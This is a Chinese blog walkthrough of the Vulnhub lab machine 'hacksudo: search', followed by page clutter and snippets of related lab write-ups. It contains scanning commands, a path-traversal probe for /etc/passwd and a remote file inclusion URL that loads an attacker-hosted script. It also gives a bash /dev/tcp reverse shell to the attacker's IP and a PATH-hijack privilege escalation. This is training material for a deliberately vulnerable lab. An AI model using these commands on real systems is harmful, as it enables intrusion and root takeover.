Vulnhub: hacksudo: search靶机

最新推荐文章于 2024-11-01 16:03:12 发布
最新推荐文章于 2024-11-01 16:03:12 发布
阅读量289 收藏
点赞数
文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/132010315
版权

kali:192.168.111.111

靶机:192.168.111.170

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.170

80端口目录爆破

feroxbuster -k -d 1 --url http://192.168.111.170 -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x php,bak,txt,html,sql,zip,phtml,sh,pcapng,pcap,conf -t 1 -C 404,500

查看search1.php源码

漏洞利用

猜测该页面存在文件包含,利用wfuzz爆破参数名

wfuzz -c -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/burp-parameter-names.txt --hc 404 --hh 2918 http://192.168.111.170/search1.php?FUZZ=../../../../../../../../../../../../../../etc/passwd

同时发现目标存在远程文件包含

http://192.168.111.170/search1.php?me=http://192.168.111.111:8000/b.php&cmd=id

之后执行反弹shell

bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/5555 0>&1'

提权

/var/www/html/.env文件中发现hacksudo用户的密码

查找suid权限的文件

find / -perm -u=s 2> /dev/null

/home/hacksudo/search/tools/该目录下存在该程序的源码

发现该程序会执行install命令,修改环境变量提权

echo '/bin/bash' > /tmp/install
chmod 777 /tmp/install
export PATH=/tmp:$PATH
./searchinstall

flag

ctostm
关注
Vulnhub:Digitalworld.local (Development)靶机
qq_43884092的博客
04-09 591
访问development目录,提示存在一个流量包,查看流量包发现另一个网站路径:/developmentsecretpage/directortestpagev1.php,访问该路径后退出登录,再重新登录,用户名和密码随便填写,之后页面提示报错,根据报错搜索关键字
Vulnhub:SUNSET-DAWN靶机
logan_logan的博客
06-06 572
1.在浏览器中输入目标靶机IP地址,浏览网页 2.端口扫描 发现开启了samba服务,接下来对samba服务进行枚举; nmap -p- 192.168.31.130 nmap -sC -sV -p 139,445,3306,12345 192.168.31.130 对samba服务枚举得时候发现了ITDEPT共享目录,不需要密码就可以登录 enum4linux -a -o 192.168.31.130 登录samba后,发现并没有文件存在,但是这个目录可以上传文件; smbclient
vulnhubhacksudo search
qwweggfe的博客
08-16 352
kali:192.168.181.129 靶机: 192.168.181.152 信息收集: 首先进行ip扫描 打开网页进行查看 于是对目录进行扫描 我在浏览的过程中发现/search1.php这个目录下,我先他好像有文件包含漏洞 http://192.168.181.152/search1.php?me=/etc/passwd 将M改为m可以远程执行命令 webshell上传 首先在kali开启web服务 python3 http.server 888...
Vulnhub_hacksudo_fog
qq_45434762的博客
05-22 820
主机信息kali: 192.168.1.11 hacksudo_fog: 192.1.12 信息收集使用nmap扫描目标主机IP发现开放以下端口nmap -T4 -A -v -p- 19...
Vulnhub靶机hacksudo-search
qq_48904485的博客
02-10 1183
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机hacksudo-search(10.0.2.50)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/hacksudo/hacksudo-search.zip。
HACKSUDO_SEARCH靶机详解
weixin_44681307的博客
07-10 192
这个目录其实才是我们正常的一个主页面,在Contact这个页面看到FUZZ,这是个很明显的提示,就是告诉我们这里有个文件包含漏洞,在About页面发现是个me,我也没扫描,直接用me尝试了一下,发现包含页面就是me。这时候就想到了利用环境变量提权,因为原本的install是/usr/bin目录下的install,我们自己伪造一个,让系统执行我们伪造的,并且又是root权限执行,这样我们就拿到了root权限。这个靶场直接是有ip的,然后单独对这个ip做了个扫描,发现并没有什么可用的。
Vulnhub_hacksudo-search
qq_45434762的博客
05-09 1047
主机信息kali: 192.168.1.10 hacksudo-search: 192.168.1.9 信息收集通过信息收集发信目标追击开发22、80两个端口nmap -T4 -A -v ...
Vulnhubhacksudo search
Aukum的博客
09-03 833
Vulnhub——hacksudo系列search靶机,信息收集找到文件包含入口,利用远程文件包含漏洞getshell,修改PATH环境变量获得root权限。
Vulnhubhacksudo1.0.1
Aukum的博客
09-05 1003
Vulnhub——hacksudo 1.0.1靶机,开放http,ssh服务,渗透过程涉及到常规的信息收集,tomcat后台弱口令+war包上传漏洞getshell,图片隐写,定时任务写入shell,rot13解密,scp提权。
vulnhub靶机hacksudo search
m0_73248913的博客
06-11 162
这个是将install改成root权限,那么加上bash就可以提权。由于参数是开发自己写的并没有利用框架只能用comm试试。小提示看看shadow行不行,不行的话再看远程请求。但是一个个试的时候密码确实没有问题。重启多此不回显只能转ssh去看了。要把install加入环境变量。如果出现clear的时候报错。太慢了,应该是信息收集不到位。失败了因该是要爆破参数了。emmm又要改hots。应该没事先试试这个参数。不正常的是home这个。线索断了看一下源代码。发现其实是有数据库的。再web这发现点东西。
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub:WebDeveloper:1靶机
qq_43884092的博客
03-27 285
目录爆破发现ipdata目录,进入该目录发现一个流量包,下载使用wireshark打开,查看/var/www/html/wp-config.php获得数据库账号密码,同时该密码也是系统用户webdeveloper的密码
基于 SM3 的密钥派生函数 (KDF):国密合规的安全密钥生成方案
A_Lonely_Smile的博客
10-29 963
在现代加密技术中,密钥派生函数(Key Derivation Function, KDF)是一个将初始输入(如密码、共享密钥等)转换为安全密钥的过程,用于实现加密、消息认证等密码操作。特别是在符合国密标准的场景中,基于 SM3 的 KDF 已成为一种常用的密钥生成方式。本文将详细讲解 SM3-KDF 的工作原理,逐步介绍其实现过程,并提供 Java 代码示例,帮助您理解如何在项目中应用 SM3-KDF。
前端如何安全存储密钥,防止信息泄露
AM1n98的博客
10-30 1227
把公钥写在前端代码文件里被公司检测到了要整改,整理几种常见的前端密钥存储方案。
冷钱包与热钱包的差异 | 加密货币存储的安全方案
最新发布
tusik68的博客
11-01 1154
想要安全存储加密货币?了解冷钱包和热钱包的核心差异,找到适合的存储方式,确保您的数字资产安全无忧。
轻型民用无人驾驶航空器安全操控理论培训知识总结-多旋翼部分
Lizzy_Fly的博客
10-30 872
15.航空器的视觉避障只有在光照等环境条件满足视觉系统工作要求时才能生效,光照条件特别暗或者特别亮的情况下,请谨慎飞行,即使视觉系统正常工作时,也可能无法精准识别高压线,而且高压线还会影响图传和遥控信号,因此不建议在高压线间飞行,如因电力巡检等工作原因必须在此环境下飞行,建议经专门培训后再进行操作;当航空器记录了返航点并且在定位服务良好的情况下,航空器电池电量不足、遥控器与航空器之间失去通讯信号以及图传信号丢失时,将会触发自动返航,操控员也可主动开启自动返航,航空器将自动返回返航点并降落。
Linux系统安全配置
qq_24442273的博客
10-28 902
【代码】Linux系统安全配置。
【Python爬虫实战】网络爬虫完整指南:HTTP/HTTPS协议与爬虫安全实践
小火龙的博客
10-29 1113
是互联网的核心协议之一,用于在客户端(如浏览器或爬虫)和服务器之间传输数据。HTTP协议定义了请求和响应的格式,帮助不同设备进行信息交换,例如我们在浏览网页时,浏览器就是通过HTTP向服务器请求页面内容,然后显示在用户面前。是HTTP协议的升级版,通过SSL/TLS加密协议增强了数据传输的安全性。HTTPS协议会在数据传输过程中对数据进行加密,防止中途被拦截或篡改,因此在保护用户隐私和敏感信息方面起到了重要作用。
网站被浏览器提示不安全怎么办?——附解决方案
2403_87921797的博客
10-30 537
首先,确保你的网站使用了有效的SSL证书。使用安全扫描工具来检测潜在的安全问题。记住,网站安全不仅关乎用户体验,也直接影响到网站的搜索排名和信誉。:在解决问题期间,通过社交媒体、电子邮件等方式通知用户你的网站正在进行安全维护,以减少用户的不信任感。:如果你已经解决了安全问题,可以向浏览器提供商提交重新审查的请求,以便他们更新你的网站安全状态。:即使问题得到解决,也需要持续监控网站的安全状态,防止未来再次出现安全问题。:确保你的网站托管服务提供商具有良好的安全记录,能够提供必要的安全支持。
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值